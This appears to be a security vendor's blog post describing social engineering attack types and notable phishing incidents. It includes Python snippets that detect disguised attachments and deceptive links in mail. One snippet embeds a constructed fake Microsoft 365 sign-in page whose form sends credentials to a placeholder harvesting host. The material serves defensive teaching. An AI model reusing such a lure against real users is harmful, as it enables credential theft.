Social engineering is a lot like home security. Your home may have thousands of locks and deadbolts, guard dogs, alarm systems, floodlights, barbed-wire fences, or armed security personnel.
All of it won’t matter if you trust the person at the gate who claims to be the food delivery guy and let him in without first checking to see if he’s legit; you’ll be exposed to whatever risk he represents.
This is how social engineering works. We explained what social engineering is in a previous article, and this one will expand on famous examples and types.
What Is Social Engineering?
Social engineering attacks the weakest link: it exploits people to get them to divulge confidential information about an individual or an organization. When criminals target individuals, they usually attempt to trick people into handing over passwords, bank details, or other sensitive information.
Alternatively, the attacker may use the same tricks to gain access to a victim’s computer and secretly install malicious software, which in turn gives them access to sensitive information.
Social Engineering Types
The human element is the one common thread that runs through all of these social engineering techniques. Cybercriminals understand that exploiting human emotions is the most effective way to steal valuable information. The following are the ten most common types of social engineering attacks:
Phishing
Phishing is a social engineering attack commonly used to steal users’ personal information such as login credentials, credit card numbers, etc. Phishing occurs when a hacker impersonates a trustworthy entity and persuades a victim to open an email, instant message, or SMS.
Spear Phishing
Spear phishing is an electronic communication scam that targets a specific person, company, or organization. Cybercriminals may intend to install malware on a targeted user’s computer in addition to stealing data for malicious purposes.
Baiting
Baiting is a social engineering attack in which a scammer uses a false promise to lure a victim into a trap, then steals personal and financial information or installs malware on the system. The attack may take the form of a malicious attachment with a tempting name.
Scareware
The victims of scareware are bombarded with false alarms and fictitious threats. Users are tricked into believing malware is infecting their system, and the alarms then prompt them to install software that gives the criminal remote access.
Pretexting
Pretexting is a method of fabricating a scenario to persuade victims to reveal information they should not. Pretexting is frequently used against businesses that keep client information, such as banks, credit card companies, utility companies, and the transportation industry.
Quid Pro Quo
Quid pro quo is when a criminal requests sensitive information such as critical data, login credentials, or money in exchange for a service. For example, a computer user may receive a phone call from a criminal posing as a technology expert who offers free IT help or technology upgrades in exchange for login credentials.
Tailgating
Tailgating, also known as “piggybacking,” is when an unauthorized person uses social engineering tactics to manipulate their way into a restricted or employee-only area. For example, the attacker could pose as a delivery driver or a custodian. Once an employee has opened the door, the attacker asks the employee to hold it open, allowing the hacker in.
Vishing & Smishing
Smishing, also known as SMS phishing, is a social engineering attack that deceives recipients through text messages. Vishing, or voice phishing, is phone fraud that uses voice messages to obtain personal information or money from victims.
Water-Holing
A water-holing attack exploits a security flaw in websites the victims visit. The attacker attempts to compromise a specific group of end users by infecting websites that the group is known to frequent. The objective is to infect a targeted user’s computer and from there access the target’s workplace network.
Dumpster Diving
Dumpster diving is the process of looking through a person’s or a company’s trash for information to use in an attack on a computer network. For example, dumpster divers search the victim’s trash for financial statements, medical bills, government records, résumés, and other documents.
Social Engineering Examples
Ask any cybersecurity professional, and they will tell you that the weakest link in the cybersecurity chain is the human who takes someone or a situation at face value. We regularly warn our audience to be alert for social engineering attempts, but while definitions are helpful, humans usually learn best by example.
It’s time to get you one step closer to genuinely understanding the buzzword “social engineering” by hearing stories of ingenious pretexts, social engineering examples, and hacking exercises.
Here are a few infamous instances of social engineering attacks in action.
$100 Million Phishing Scam on Google and Facebook
Evaldas Rimasauskas carried out the world’s most famous (as far as we know) social engineering attack on two of the world’s biggest companies: Facebook and Google. Rimasauskas and his colleagues set up a bogus corporation that appeared to be a computer manufacturer working with Google and Facebook. Rimasauskas also opened bank accounts in the company’s name.
These scam artists then sent phishing emails to particular Google and Facebook employees, billing them for goods and services that the manufacturer had legitimately provided — but instructing them to pay money into their fraudulent accounts. As a result, Rimasauskas and his associates defrauded the two tech behemoths of over $100 million between 2013 and 2015.
User Credentials Stolen in a Microsoft 365 Phishing Scam
Security researchers at Microsoft discovered a Business Email Compromise (BEC) scam against Microsoft 365 users in April 2021 that convinced the recipient to install malicious code on their device.
The target received a blank email with the subject line “price revision.” The email’s attachment appeared to be an Excel spreadsheet file (.xlsx). However, that “spreadsheet” was a .html file masquerading as a spreadsheet.
After opening the disguised .html file, the target was taken to a website containing malicious code. The code displayed a pop-up notification on the user’s screen telling them that they had been logged out of Microsoft 365 and encouraging them to re-enter their login credentials.
You can probably guess what happened next: the user’s credentials went to the crooks via the fraudulent web form. During the pandemic, this type of phishing thrived, relying on human error combined with weak defenses.
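The lure above works because mail clients and users judge an attachment by its name, not its bytes. A genuine .xlsx is an Office Open XML package, which is a ZIP archive, whereas the “spreadsheet” in this case was plain HTML carrying a login form. The following is an added example (not code from the original article or from Right-Hand Cybersecurity) of a mail-gateway check that classifies an attachment from its leading bytes and flags the mismatch, plus the presence of a password field, which is what a credential-harvesting page needs. Every sample file below is constructed inline, and the file names are hypothetical.

```python
"""Flag e-mail attachments whose bytes do not match their declared extension.

Added example, not the article's or Right-Hand Cybersecurity's own code. It
models the April 2021 case: a file named like an Excel workbook (.xlsx) that is
really an HTML page carrying a credential form. Sample files are constructed
inline; the file names are hypothetical.
"""
import io
import re
import zipfile

# Office Open XML (.xlsx/.docx/.pptx) files are ZIP archives and therefore
# start with the local-file-header signature "PK\x03\x04".
ZIP_MAGIC = b"PK\x03\x04"

# Extension -> content type we expect the bytes to have.
EXPECTED = {".xlsx": "xlsx", ".html": "html", ".htm": "html",
            ".pdf": "pdf", ".zip": "zip"}

# An <input type="password"> inside an attachment is a strong signal that the
# "document" is a login form rather than a document.
CREDENTIAL_FORM = re.compile(rb"<input[^>]+type\s*=\s*['\"]?password", re.I)


def detect_content_type(data: bytes) -> str:
    """Classify a blob from its leading bytes, never from its file name."""
    head = data.lstrip()[:64].lower()
    if data.startswith(ZIP_MAGIC):
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                names = zf.namelist()
        except zipfile.BadZipFile:
            return "zip-corrupt"
        # A real workbook carries [Content_Types].xml and an xl/ part tree.
        if "[Content_Types].xml" in names and any(n.startswith("xl/") for n in names):
            return "xlsx"
        return "zip"
    if head.startswith(b"<!doctype html") or head.startswith(b"<html") or b"<script" in head:
        return "html"
    if data.startswith(b"%PDF-"):
        return "pdf"
    return "unknown"


def check_attachment(filename: str, data: bytes) -> dict:
    """Compare the declared type (from the extension) with the sniffed type."""
    ext = filename[filename.rfind("."):].lower() if "." in filename else ""
    declared = EXPECTED.get(ext, "unknown")
    actual = detect_content_type(data)
    return {
        "filename": filename,
        "declared": declared,
        "actual": actual,
        # Only raise a mismatch when we know what the extension should contain.
        "mismatch": declared != "unknown" and declared != actual,
        "credential_form": actual == "html" and bool(CREDENTIAL_FORM.search(data)),
    }


def build_sample_xlsx() -> bytes:
    """Constructed minimal workbook package: enough structure to sniff as xlsx."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook/>")
    return buf.getvalue()


SAMPLE_XLSX = build_sample_xlsx()

# Constructed HTML lure in the style described in the article: a fake
# "signed out" notice with a credential form. The action host is a reserved
# placeholder, not a real site.
SAMPLE_PHISH = b"""<!DOCTYPE html><html><body>
<p>You have been signed out of Microsoft 365. Sign in again to view the document.</p>
<form action="https://harvest.example.invalid/collect" method="post">
  <input name="user"><input name="pwd" type="password"><button>Sign in</button>
</form></body></html>"""

if __name__ == "__main__":
    for name, blob in [("price_revision.xlsx", SAMPLE_XLSX),
                       ("price_revision.xlsx", SAMPLE_PHISH)]:
        print(check_attachment(name, blob))
```

Run as a script it prints one clean verdict and one flagged verdict for the same file name; the point is that the name is identical in both cases and only the bytes distinguish them. A gateway would quarantine on `mismatch` alone and escalate when `credential_form` is also set.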
Whaling Attack on a Belgian Bank Steals $75 Million
One of the most successful social engineering attacks of all time happened to Crelan, a Belgian bank. Crelan discovered that its CEO had been “whaled” during a routine internal audit; the perpetrators got away with $75 million.
Crelan was a victim of “whaling,” a type of spear-phishing in which cyber criminals target high-ranking executives. Because these large targets have easy access to funds, cybercriminals frequently try to harpoon them.
Vishing Scam Compromises High-Profile Twitter Accounts
In July 2020, due to a vishing scam, Twitter lost control of around 130 accounts, including those of Joe Biden, Barack Obama, and Kanye West, among the world’s most famous people. The hackers stole some users’ Twitter data, accessed DMs, and sent out Tweets requesting Bitcoin donations. The perpetrators earned around $110,000 in Bitcoin across more than 320 transactions in just a few minutes before Twitter could remove the tweets.
The incident was labeled as a vishing attack by Twitter. The nature of the calls is still unknown, but the criminals duped Twitter employees into disclosing account credentials that gave them access to the compromised accounts. Twitter’s stock dropped 7% in pre-market trading the next day as a result of the scandal.
Microsoft SharePoint Phishing Scam Targets Remote Workers
Another phishing attack was discovered in April 2021, aimed at remote workers who use cloud-based software. The attack began when the target received an email requesting their signature on a document hosted in Microsoft SharePoint, written in the urgent tone preferred by phishing scammers.
Many office workers were familiar with the SharePoint logo and branding. However, the link took users to a phishing site designed to steal their credentials. Phishing attacks are increasingly focusing on remote collaboration software. According to Microsoft research, nearly half of IT professionals cited the need for new collaboration tools as a significant security vulnerability as they transitioned to working from home.
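What gives this lure away is not the branding, which the attacker copies faithfully, but where the link actually goes. The following is an added example (not code from the original article or from Right-Hand Cybersecurity) of a check a mail filter can run over an HTML message body: it extracts every link, and flags a link when its visible text is a URL on a different host than the real target, or when the message trades on a brand (SharePoint, Microsoft 365) while the link leaves that brand’s domains. The sample message, the hypothetical lure host `docs-share.example`, and the brand-to-domain table are all constructed for this demonstration; a deployment would maintain its own table.

```python
"""Flag links in an HTML e-mail whose visible text or branding points one way
while the href points somewhere else.

Added example, not the article's or Right-Hand Cybersecurity's own code. It
models the SharePoint lure described in the article. The sample message, the
hypothetical host docs-share.example and the brand table are constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed table: brand words that appear in lures, mapped to the registrable
# domains under which a genuine link for that brand is expected.
BRAND_DOMAINS = {
    "sharepoint": ("sharepoint.com", "microsoft.com", "office.com"),
    "microsoft 365": ("microsoft.com", "office.com", "microsoftonline.com"),
}


def host_matches(host: str, domains) -> bool:
    """True if host is one of the domains or a subdomain of one of them."""
    return any(host == d or host.endswith("." + d) for d in domains)


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> in the body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def find_suspicious_links(html: str) -> list:
    """Return one finding per link that fails either consistency check."""
    parser = LinkCollector()
    parser.feed(html)
    body_lower = html.lower()
    findings = []
    for href, text in parser.links:
        host = (urlparse(href).hostname or "").lower()
        reasons = []
        # Check 1: the visible text is itself a URL, but on a different host
        # than the real target (classic "display URL" deception).
        if text.lower().startswith(("http://", "https://")):
            shown = (urlparse(text).hostname or "").lower()
            if shown and shown != host:
                reasons.append(f"display host {shown} != link host {host}")
        # Check 2: the message invokes a brand, but the link leaves the
        # domains where that brand's pages genuinely live.
        for brand, domains in BRAND_DOMAINS.items():
            if brand in body_lower and not host_matches(host, domains):
                reasons.append(f"{brand} branding but link host {host}")
        if reasons:
            findings.append({"href": href, "text": text, "reasons": reasons})
    return findings


# Constructed message in the style of the lure: SharePoint branding, an urgent
# ask, one genuine-looking link and one that only looks genuine.
SAMPLE_EMAIL = """<html><body>
<img alt="SharePoint" src="cid:logo">
<p>A document requires your signature today. Please review it before 5 pm.</p>
<p><a href="https://docs-share.example/review?doc=42">https://contoso.sharepoint.com/sites/finance/Contract.pdf</a></p>
<p>Having trouble? Open the site directly:
<a href="https://contoso.sharepoint.com/sites/finance">https://contoso.sharepoint.com/sites/finance</a></p>
</body></html>"""

if __name__ == "__main__":
    for finding in find_suspicious_links(SAMPLE_EMAIL):
        print(finding)
```

Only the first link is reported, with both reasons; the second link is left alone because its visible text and its target agree and both sit under sharepoint.com. The brand check is deliberately coarse (any mention of the brand word in the body), which is the right trade-off for a quarantine-and-review queue but would need tuning before it blocked mail outright.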
Prevent Social Engineering Attacks in Your Organization
The social engineering examples show that these attacks depend on the attacker gaining the victim’s trust. Therefore, pay close attention to emails: double-check attachments and links, and be wary of urgent orders involving money. The one thing all of these attacks have in common, whether they arrive via email, text, or voicemail, is that they are challenging to detect.
This is where Right-Hand Cybersecurity comes in. We help you analyze and learn from your organization’s email data, using AI and machine learning to protect employees from inbound email security threats such as whaling, spear phishing, and other targeted social engineering attacks.
Book a demo today to learn more about how Right-Hand can protect your people and data from social engineering attacks.